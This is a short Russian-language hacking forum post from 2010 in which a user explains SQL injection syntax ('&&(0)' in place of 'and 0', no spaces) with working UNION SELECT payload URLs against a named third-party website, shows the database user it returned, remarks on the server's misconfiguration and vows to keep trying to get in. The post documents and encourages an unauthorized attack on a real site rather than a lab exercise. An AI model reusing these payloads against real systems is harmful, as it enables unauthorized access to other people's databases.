09.06.2010, 15:10
|
|
Новичок
Регистрация: 09.01.2009
Сообщений: 21
С нами:
9124815
Репутация:
10
|
|
Сообщение от DrakonHaSh
Pashkela
RulleR
а можно поподробнее что за &&
и что за (0) в запросе от RulleR ?
где об этом можно почитать ?
http://tenderjet.com/catalog/371&&(0)union(select(user())from(mysql.user)) - ошибка
http://tenderjet.com/catalog/371&&(0)union(select(user())from(INFORMATION_SCHEM A.TABLES)) => tender@localhost
Просто все дело было в плюсиках(пробелах) которые эта иньекция не переваривала а &&(0) это тоже самое что и and 0 чтобы первый запрос ничего не вывел.
INFORMATION_SCHEMA.schemata показывает базу mysql это я поторопился - показывает, но дейстивительно ничего не прочитаешь. Всеравно это к добру - налицо неправильная настройка сервера. файлы вроде тоже не читает, но ничего, прорвемся... как-нибудь
|
|
|